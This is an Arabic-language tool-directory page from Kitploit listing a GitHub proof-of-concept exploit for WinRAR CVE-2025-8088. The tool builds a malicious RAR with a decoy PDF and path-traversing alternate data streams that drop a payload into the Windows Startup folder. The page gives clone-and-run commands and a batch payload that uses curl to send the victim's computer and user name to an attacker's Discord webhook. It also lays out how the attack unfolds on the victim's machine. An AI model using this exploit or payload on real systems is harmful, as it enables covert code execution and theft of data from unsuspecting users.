Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-8088-Exploit — استغلال لإثبات المفهوم لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 وما دون. تنشئ هذه الأداة أرشيف RAR خبيث يضمّن الحمولات في تدفقات البيانات البديلة (ADS) مع اجتياز المسار، مما قد يؤدي إلى تنفيذ كود تعسفي. | Kitploit
أدوات/GitHubGitHub/techcorp/cve-2025-8088-exploit
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHubtechcorp/cve-2025-8088-exploit

CVE-2025-8088-Exploit

استغلال لإثبات المفهوم لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 وما دون. تنشئ هذه الأداة أرشيف RAR خبيث يضمّن الحمولات في تدفقات البيانات البديلة (ADS) مع اجتياز المسار، مما قد يؤدي إلى تنفيذ كود تعسفي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

استغلال CVE-2025-8088 WinRAR 🔓

استغلال إثبات مفهوم لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 وما دونها. تنشئ هذه الأداة أرشيف RAR خبيث يضمّن الحمولات في تدفقات البيانات البديلة (ADS) مع اجتياز المسار، مما قد يؤدي إلى تنفيذ تعسفي للكود.

  • المشكلة في الكثير من الأدوات الأخرى أنها لا تدمج عدة تدفقات ADS، مما يتطلب إما الحظ في امتلاك مسار الاجتياز الصحيح أو معرفة اسم المستخدم/دليل الاستخراج المحدد.

🚀 كيف يعمل

  1. ينشئ مستندًا خادعًا 📄 - يولّد ملف PDF بمظهر احترافي (سيرة ذاتية أو تقرير اختبار اختراق)
  2. يضمّن عدة تدفقات ADS 🔄 - يرفق تدفقات الحمولة بأعماق مختلفة لاجتياز المسار
  3. يتلاعب بترويسات RAR ⚙️ - يعدّل بنية الأرشيف لاستغلال ثغرة اجتياز المسار
  4. يسقط الحمولة في مجلد بدء التشغيل 📂 - يحاول كتابة الحمولة إلى مجلد بدء التشغيل في Windows عند الاستخراج

🛠️ الاستخدام

root@kitploit:~
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py

✏️ تخصيص الحمولة

عدّل الحمولة لاستدعاء ويب هوك Discord:

root@kitploit:~
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

استبدل YOUR_DISCORD_WEBHOOK_URL بعنوان ويب هوك الفعلي لديك.

🔄 تسلسل التنفيذ

  1. يقوم الضحية باستخراج ملف RAR باستخدام WinRAR الثُّغري (≤7.12)
  2. تُكتب الحمولة في مجلد بدء التشغيل:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. عند إعادة التشغيل التالية ➡️ تُنفَّذ الحمولة تلقائيًا

📋 المتطلبات

  • نظام Windows 🪟
  • Python 3.x 🐍
  • WinRAR مثبّت
  • مكتبة ReportLab (pip install reportlab)
تنزيل الأداة